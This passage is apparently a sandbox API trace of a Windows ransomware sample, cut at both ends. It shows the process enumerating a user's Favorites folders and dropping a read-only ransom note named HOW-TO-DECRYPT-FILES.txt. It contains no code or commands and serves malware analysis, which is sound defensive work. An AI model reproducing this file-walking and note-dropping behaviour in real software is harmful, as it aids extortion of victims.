(lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\microsoft websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.584] GetLastError () returned 0x5 [0059.585] SetErrorMode (uMode=0x0) returned 0x1 [0059.585] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\Microsoft At Work.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\Microsoft At Work.url", lpFilePart=0x0) returned 0x43 [0059.585] GetLastError () returned 0x5 [0059.585] SetErrorMode (uMode=0x1) returned 0x0 [0059.585] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\eebsym5\\favorites\\microsoft websites\\microsoft at work.url"), fInfoLevelId=0x0, lpFileInformation=0x1c567dc | out: lpFileInformation=0x1c567dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.586] GetLastError () returned 0x5 [0059.586] SetErrorMode (uMode=0x0) returned 0x1 [0059.586] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0059.586] GetLastError () returned 0x5 [0059.586] SetErrorMode (uMode=0x1) returned 0x0 [0059.586] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\microsoft websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.586] GetLastError () returned 0x5 [0059.587] SetErrorMode (uMode=0x0) returned 0x1 [0059.587] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\Microsoft Store.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\Microsoft Store.url", lpFilePart=0x0) returned 0x41 [0059.587] GetLastError () returned 0x5 [0059.587] SetErrorMode (uMode=0x1) returned 0x0 [0059.587] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\eebsym5\\favorites\\microsoft websites\\microsoft store.url"), fInfoLevelId=0x0, lpFileInformation=0x1c743cc | out: lpFileInformation=0x1c743cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd3082b0, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x86)) returned 1 [0059.587] GetLastError () returned 0x5 [0059.587] SetErrorMode (uMode=0x0) returned 0x1 [0059.588] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0059.588] GetLastError () returned 0x5 [0059.588] SetErrorMode (uMode=0x1) returned 0x0 [0059.588] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\microsoft websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.588] GetLastError () returned 0x5 [0059.588] SetErrorMode (uMode=0x0) returned 0x1 [0059.589] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites", lpFilePart=0x0) returned 0x27 [0059.589] GetLastError () returned 0x5 [0059.589] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.589] GetLastError () returned 0x5 [0059.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.589] GetLastError () returned 0x5 [0059.589] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites", lpFilePart=0x0) returned 0x27 [0059.589] GetLastError () returned 0x5 [0059.589] SetErrorMode (uMode=0x1) returned 0x0 [0059.589] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0059.597] GetLastError () returned 0x5 [0059.597] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.597] GetLastError () returned 0x5 [0059.597] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.597] GetLastError () returned 0x5 [0059.597] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.597] GetLastError () returned 0x5 [0059.597] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.597] GetLastError () returned 0x5 [0059.597] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.597] GetLastError () returned 0x5 [0059.597] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.597] GetLastError () returned 0x5 [0059.597] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.597] GetLastError () returned 0x5 [0059.597] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.597] GetLastError () returned 0x12 [0059.597] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0059.598] SetErrorMode (uMode=0x0) returned 0x1 [0059.598] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites", lpFilePart=0x0) returned 0x27 [0059.598] GetLastError () returned 0x12 [0059.598] SetErrorMode (uMode=0x1) returned 0x0 [0059.598] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0059.599] GetLastError () returned 0x12 [0059.599] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.599] GetLastError () returned 0x12 [0059.599] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.599] GetLastError () returned 0x12 [0059.599] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.599] GetLastError () returned 0x12 [0059.599] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.599] GetLastError () returned 0x12 [0059.599] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.599] GetLastError () returned 0x12 [0059.599] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.599] GetLastError () returned 0x12 [0059.599] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.600] GetLastError () returned 0x12 [0059.600] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.600] GetLastError () returned 0x12 [0059.600] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0059.600] SetErrorMode (uMode=0x0) returned 0x1 [0059.600] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN Autos.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN Autos.url", lpFilePart=0x0) returned 0x35 [0059.600] GetLastError () returned 0x12 [0059.600] SetErrorMode (uMode=0x1) returned 0x0 [0059.600] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn autos.url"), fInfoLevelId=0x0, lpFileInformation=0x1c93a0c | out: lpFileInformation=0x1c93a0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.602] GetLastError () returned 0x12 [0059.602] SetErrorMode (uMode=0x0) returned 0x1 [0059.602] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0059.602] GetLastError () returned 0x12 [0059.602] SetErrorMode (uMode=0x1) returned 0x0 [0059.602] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.602] GetLastError () returned 0x0 [0059.602] GetFileType (hFile=0x184) returned 0x1 [0059.602] SetErrorMode (uMode=0x0) returned 0x1 [0059.602] GetFileType (hFile=0x184) returned 0x1 [0059.602] WriteFile (in: hFile=0x184, lpBuffer=0x1caf5f4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1caf5f4*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0059.603] GetLastError () returned 0x0 [0059.603] CloseHandle (hObject=0x184) returned 1 [0059.603] GetLastError () returned 0x0 [0059.603] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0059.603] GetLastError () returned 0x0 [0059.603] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0059.604] GetLastError () returned 0x0 [0059.604] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN Entertainment.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN Entertainment.url", lpFilePart=0x0) returned 0x3d [0059.604] GetLastError () returned 0x0 [0059.604] SetErrorMode (uMode=0x1) returned 0x0 [0059.604] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn entertainment.url"), fInfoLevelId=0x0, lpFileInformation=0x1cb12a8 | out: lpFileInformation=0x1cb12a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.604] GetLastError () returned 0x0 [0059.604] SetErrorMode (uMode=0x0) returned 0x1 [0059.604] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0059.604] GetLastError () returned 0x0 [0059.604] SetErrorMode (uMode=0x1) returned 0x0 [0059.604] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.604] GetLastError () returned 0x5 [0059.605] SetErrorMode (uMode=0x0) returned 0x1 [0059.605] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN Money.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN Money.url", lpFilePart=0x0) returned 0x35 [0059.605] GetLastError () returned 0x5 [0059.605] SetErrorMode (uMode=0x1) returned 0x0 [0059.605] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn money.url"), fInfoLevelId=0x0, lpFileInformation=0x1ccf03c | out: lpFileInformation=0x1ccf03c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.605] GetLastError () returned 0x5 [0059.605] SetErrorMode (uMode=0x0) returned 0x1 [0059.606] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0059.606] GetLastError () returned 0x5 [0059.606] SetErrorMode (uMode=0x1) returned 0x0 [0059.606] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.606] GetLastError () returned 0x5 [0059.606] SetErrorMode (uMode=0x0) returned 0x1 [0059.606] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN Sports.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN Sports.url", lpFilePart=0x0) returned 0x36 [0059.606] GetLastError () returned 0x5 [0059.606] SetErrorMode (uMode=0x1) returned 0x0 [0059.607] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn sports.url"), fInfoLevelId=0x0, lpFileInformation=0x1cecda0 | out: lpFileInformation=0x1cecda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.607] GetLastError () returned 0x5 [0059.607] SetErrorMode (uMode=0x0) returned 0x1 [0059.607] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0059.607] GetLastError () returned 0x5 [0059.607] SetErrorMode (uMode=0x1) returned 0x0 [0059.607] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.607] GetLastError () returned 0x5 [0059.608] SetErrorMode (uMode=0x0) returned 0x1 [0059.608] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN.url", lpFilePart=0x0) returned 0x2f [0059.608] GetLastError () returned 0x5 [0059.608] SetErrorMode (uMode=0x1) returned 0x0 [0059.608] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn.url"), fInfoLevelId=0x0, lpFileInformation=0x1d0ab10 | out: lpFileInformation=0x1d0ab10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.608] GetLastError () returned 0x5 [0059.608] SetErrorMode (uMode=0x0) returned 0x1 [0059.610] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0059.610] GetLastError () returned 0x5 [0059.610] SetErrorMode (uMode=0x1) returned 0x0 [0059.611] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.611] GetLastError () returned 0x5 [0059.612] SetErrorMode (uMode=0x0) returned 0x1 [0059.612] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSNBC News.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSNBC News.url", lpFilePart=0x0) returned 0x36 [0059.612] GetLastError () returned 0x5 [0059.612] SetErrorMode (uMode=0x1) returned 0x0 [0059.612] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msnbc news.url"), fInfoLevelId=0x0, lpFileInformation=0x1b2c1e8 | out: lpFileInformation=0x1b2c1e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0059.612] GetLastError () returned 0x5 [0059.612] SetErrorMode (uMode=0x0) returned 0x1 [0059.613] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0059.613] GetLastError () returned 0x5 [0059.613] SetErrorMode (uMode=0x1) returned 0x0 [0059.613] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.613] GetLastError () returned 0x5 [0059.614] SetErrorMode (uMode=0x0) returned 0x1 [0059.614] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Windows Live", lpFilePart=0x0) returned 0x27 [0059.614] GetLastError () returned 0x5 [0059.615] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.615] GetLastError () returned 0x5 [0059.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.615] GetLastError () returned 0x5 [0059.615] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Windows Live", lpFilePart=0x0) returned 0x27 [0059.615] GetLastError () returned 0x5 [0059.615] SetErrorMode (uMode=0x1) returned 0x0 [0059.615] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360e20 [0059.620] GetLastError () returned 0x5 [0059.620] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.620] GetLastError () returned 0x5 [0059.621] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.621] GetLastError () returned 0x5 [0059.621] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.621] GetLastError () returned 0x5 [0059.621] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.621] GetLastError () returned 0x5 [0059.621] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.621] GetLastError () returned 0x5 [0059.621] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.621] GetLastError () returned 0x12 [0059.621] FindClose (in: hFindFile=0x360e20 | out: hFindFile=0x360e20) returned 1 [0059.622] SetErrorMode (uMode=0x0) returned 0x1 [0059.622] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Windows Live", lpFilePart=0x0) returned 0x27 [0059.622] GetLastError () returned 0x12 [0059.622] SetErrorMode (uMode=0x1) returned 0x0 [0059.622] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360e20 [0059.623] GetLastError () returned 0x12 [0059.623] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.623] GetLastError () returned 0x12 [0059.623] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.623] GetLastError () returned 0x12 [0059.623] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.623] GetLastError () returned 0x12 [0059.623] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.623] GetLastError () returned 0x12 [0059.624] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.624] GetLastError () returned 0x12 [0059.624] FindNextFileW (in: hFindFile=0x360e20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.624] GetLastError () returned 0x12 [0059.624] FindClose (in: hFindFile=0x360e20 | out: hFindFile=0x360e20) returned 1 [0059.625] SetErrorMode (uMode=0x0) returned 0x1 [0059.625] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\Get Windows Live.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\Get Windows Live.url", lpFilePart=0x0) returned 0x3c [0059.625] GetLastError () returned 0x12 [0059.625] SetErrorMode (uMode=0x1) returned 0x0 [0059.625] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\eebsym5\\favorites\\windows live\\get windows live.url"), fInfoLevelId=0x0, lpFileInformation=0x1b4bad4 | out: lpFileInformation=0x1b4bad4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, 